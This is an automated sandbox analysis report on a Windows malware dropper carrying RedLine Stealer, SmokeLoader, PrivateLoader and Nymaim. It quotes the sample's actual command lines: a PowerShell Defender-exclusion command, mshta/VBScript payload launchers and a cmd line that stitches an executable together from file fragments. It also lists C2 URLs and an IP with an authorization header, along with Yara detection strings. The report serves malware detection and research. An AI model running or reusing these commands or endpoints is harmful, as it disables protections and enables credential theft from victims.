
Windows Analysis Report
abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe

Overview

General Information

Sample name: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
Analysis ID: 1496480
MD5: efa310ffcb46aa3768de9aae3a8fdcda
SHA1: fc57edeadc23e53610eb75881fc7d2cecc847387
SHA256: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb6bd2120da1c01fb1a5a
Tags: exe, RedLineStealer

Detection

CryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara Genericmalware
Yara detected CryptOne packer
Yara detected Nymaim
Yara detected PrivateLoader
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected onlyLogger
Submitted sample is a known malware sample
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to steal Chrome passwords or cookies
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens the same file many times (likely Sandbox evasion)
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Performs DNS queries to domains with low reputation
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Wscript Shell Run In CommandLine
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe" MD5: EFA310FFCB46AA3768DE9AAE3A8FDCDA)
    • setup_installer.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\setup_installer.exe" MD5: 264FBE02A8ACAE2BA9A5144F8B947AAE)
      • setup_install.exe (PID: 7700 cmdline: "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe" MD5: 33D05F6171D18F49EDD9C5B1BC5B8C72)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • powershell.exe (PID: 7760 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 4364 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7828 cmdline: C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon17eac6d534bfd22c7.exe (PID: 7892 cmdline: Mon17eac6d534bfd22c7.exe MD5: 5721981400FAF8EDB9CB2FA1E71404A2)
            • Mon17eac6d534bfd22c7.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe MD5: 5721981400FAF8EDB9CB2FA1E71404A2)
        • cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7848 cmdline: C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon17e1fac3fd3d84b.exe (PID: 7956 cmdline: Mon17e1fac3fd3d84b.exe MD5: 7C6B2DC2C253C2A6A3708605737AA9AE)
            • mshta.exe (PID: 5448 cmdline: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ) MD5: 06B02D5C097C7DB1F109749C45F3F505)
              • cmd.exe (PID: 2316 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • 09xU.exE (PID: 396 cmdline: 9xU.EXE -pPtzyIkqLZoCarb5ew MD5: 7C6B2DC2C253C2A6A3708605737AA9AE)
                  • mshta.exe (PID: 8132 cmdline: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ) MD5: 06B02D5C097C7DB1F109749C45F3F505)
                    • cmd.exe (PID: 7284 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • conhost.exe (PID: 2740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • mshta.exe (PID: 2844 cmdline: "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) ) MD5: 06B02D5C097C7DB1F109749C45F3F505)
                    • cmd.exe (PID: 7808 cmdline: "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • cmd.exe (PID: 2676 cmdline: C:\Windows\system32\cmd.exe /S /D /c" eCHO " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • cmd.exe (PID: 1352 cmdline: C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • control.exe (PID: 1196 cmdline: control .\R6f7sE.I MD5: EBC29AA32C57A54018089CFC9CACAFE8)
                        • rundll32.exe (PID: 7852 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I MD5: 889B99C52A60DD49227C5E485A016679)
                • taskkill.exe (PID: 7712 cmdline: taskkill /F -Im "Mon17e1fac3fd3d84b.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon17f45359eb9.exe (PID: 8036 cmdline: Mon17f45359eb9.exe MD5: BE60D71B303F2AAE5618315147C7D3F9)
            • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 7876 cmdline: C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixone MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon1785436ae78.exe (PID: 8076 cmdline: Mon1785436ae78.exe /mixone MD5: 0FC8BA6DE4099DDC991EADE9B86A6F06)
            • WerFault.exe (PID: 8112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 8124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 872 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 3120 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 900 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 2316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • cmd.exe (PID: 7884 cmdline: C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon17948100733a95c58.exe (PID: 8056 cmdline: Mon17948100733a95c58.exe MD5: B6B87E674629A0F112CB1283B0322CCB)
            • Mon17948100733a95c58.exe (PID: 4544 cmdline: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe MD5: B6B87E674629A0F112CB1283B0322CCB)
              • WerFault.exe (PID: 7588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • cmd.exe (PID: 7900 cmdline: C:\Windows\system32\cmd.exe /c Mon179e1058f256.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon179e1058f256.exe (PID: 8164 cmdline: Mon179e1058f256.exe MD5: ECC773623762E2E326D7683A9758491B)
        • cmd.exe (PID: 7912 cmdline: C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon1795d04d4bd.exe (PID: 8136 cmdline: Mon1795d04d4bd.exe MD5: D082843D4E999EA9BBF4D89EE0DC1886)
        • cmd.exe (PID: 7920 cmdline: C:\Windows\system32\cmd.exe /c Mon178817e243.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon178817e243.exe (PID: 7972 cmdline: Mon178817e243.exe MD5: C213A2444632FFDF0425E0288BCA48B9)
        • WerFault.exe (PID: 7320 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 980 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Name: PrivateLoader
Description: According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2020, "C2 list": ["http://lecanardstsornin.com/upload/", "http://m3600.com/upload/", "http://camasirx.com/upload/"]}
{"C2 url": "135.181.129.119:4805", "Bot Id": "she", "Authorization Header": "b69102cdbd4afe2d3159f88fb6dac731"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | MALWARE_Win_DLInjector04 | Detects downloader / injector | ditekSHen
  • 0xbc2:$s1: Runner
  • 0xc54:$s2: DownloadPayload
  • 0xc64:$s3: RunOnStartup
  • 0xbd6:$a1: Antis
  • 0xc03:$a2: antiVM
  • 0xc0a:$a3: antiSandbox
  • 0xc16:$a4: antiDebug
  • 0xc20:$a5: antiEmulator
  • 0xc2d:$a6: enablePersistence
  • 0xc3f:$a7: enableFakeError
  • 0xc7f:$a8: DetectVirtualMachine
  • 0xca4:$a9: DetectSandboxie
  • 0xccf:$a10: DetectDebugger
  • 0xcde:$a11: CheckEmulator
C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll | MALWARE_Win_DLInjector03 | Detects unknown loader / injector | ditekSHen
  • 0xccf9:$x1: LOADER ERROR
  • 0x5f53:$s1: _ZN6curlpp10OptionBaseC2E10CURLoption
  • 0xcd06:$s2: The procedure entry point %s could not be located in the dynamic link library %s
C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | JoeSecurity_Generic_malware | Yara Generic_malware | Joe Security
Source | Rule | Description | Author | Strings
00000018.00000002.1990631383.0000000001700000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001D.00000002.4154666399.000000000184F000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x1250:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_onlyLogger | Yara detected onlyLogger | Joe Security
0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
(77 entries in total; only the first five are shown here)
Source | Rule | Description | Author | Strings
1.3.setup_installer.exe.31a1c46.7.raw.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
29.2.Mon179e1058f256.exe.5c50000.8.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
29.2.Mon179e1058f256.exe.5c50000.8.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
29.2.Mon179e1058f256.exe.5c50000.8.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x13c51:$a4: get_ScannedWallets
  • 0x13739:$a5: get_ScanTelegram
  • 0x1380d:$a6: get_ScanGeckoBrowsersPaths
  • 0x13960:$a7: <Processes>k__BackingField
  • 0x12b8f:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1355a:$a9: <ScanFTP>k__BackingField
29.2.Mon179e1058f256.exe.5c50000.8.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x13500:$u7: RunPE
  • 0x13506:$u8: DownloadAndEx
  • 0x1b042:$pat14: , CommandLine:
  • 0x12aa3:$v2_1: ListOfProcesses
  • 0x136a5:$v2_2: get_ScanBrowsers
  • 0x136e3:$v2_2: get_ScanFTP
  • 0x136fb:$v2_2: get_ScanWallets
  • 0x1371b:$v2_2: get_ScanScreen
  • 0x13739:$v2_2: get_ScanTelegram
  • 0x1375b:$v2_2: get_ScanVPN
  • 0x13773:$v2_2: get_ScanSteam
  • 0x1378f:$v2_2: get_ScanDiscord
  • 0x137d5:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1380d:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x13c51:$v2_2: get_ScannedWallets
  • 0x12de4:$v2_3: GetArguments
  • 0x12fc9:$v2_4: VerifyUpdate
  • 0x12df1:$v2_5: VerifyScanRequest
  • 0x12fbe:$v2_6: GetUpdates
  • 0x18e30:$v2_6: GetUpdates
  • 0x10eb1:$v4_3: base64str
(158 entries in total; only the first five are shown here)

System Summary

                  Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: Mon17e1fac3fd3d84b.exe, ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe, ParentProcessId: 7956, ParentProcessName: Mon17e1fac3fd3d84b.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ProcessId: 5448, ProcessName: mshta.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, ParentProcessId: 7700, ParentProcessName: setup_install.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ProcessId: 7752, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: Mon17e1fac3fd3d84b.exe, ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe, ParentProcessId: 7956, ParentProcessName: Mon17e1fac3fd3d84b.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ProcessId: 5448, ProcessName: mshta.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5448, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , ProcessId: 2316, ProcessName: cmd.exe
